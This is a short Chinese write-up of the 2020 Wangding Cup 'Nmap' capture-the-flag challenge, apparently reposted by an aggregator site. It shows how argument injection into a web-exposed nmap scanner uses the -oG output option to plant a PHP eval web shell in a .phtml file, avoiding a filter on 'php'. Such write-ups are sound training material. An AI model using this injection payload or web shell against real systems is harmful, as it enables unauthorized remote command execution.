[网鼎杯 2020 朱雀组]Nmap
Posted H3rmesk1t
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[网鼎杯 2020 朱雀组]Nmap相关的知识,希望对你有一定的参考价值。
考点
这里是引用
思路
打开页面,发现是一个nmap扫描器;
尝试之后发现能够进行一些扫描并记录扫描结果;
尝试对扫描结果进行指定文件保存,输入’ -oN test.txt ',然后访问/test.txt,得到
# Nmap 6.47 scan initiated Mon May 17 07:58:36 2021 as: nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/3f936 -oN test.txt \\ \\\\;
于是猜测是否可以写一个木马文件上去,测试发现过滤了php字符串;
上传内容:<?=eval($_POST['cmd']);?>
上传文件后缀:phtml
Payload
Payload:' <?= eval($_POST["cmd"]);?> -oG door.phtml '
以上是关于[网鼎杯 2020 朱雀组]Nmap的主要内容,如果未能解决你的问题,请参考以下文章